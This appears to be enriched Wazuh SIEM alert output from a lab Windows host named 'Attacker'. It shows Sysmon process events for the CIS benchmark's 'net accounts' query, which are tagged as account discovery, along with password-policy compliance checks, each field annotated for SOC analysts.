Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2183679
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.4317579Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288458
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.425 ProcessGuid: {94294ddc-be35-680a-060c-000000000e00} ProcessId: 4616 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.425
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-060c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:41:59.442+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.442+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2188912
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26001
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.829+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.829+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2194244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26003
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Minimum password length' is set to '14 or more character(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.196+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.196+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2200582
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.7743593Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288469
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.769 ProcessGuid: {94294ddc-be35-680a-080c-000000000e00} ProcessId: 10112 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be35-680a-060c-000000000e00} ParentProcessId: 4616 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.769
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-080c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be35-680a-060c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.207+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.207+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2205637
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.8470037Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288473
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.841 ProcessGuid: {94294ddc-be35-680a-090c-000000000e00} ProcessId: 15044 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.841
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-090c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

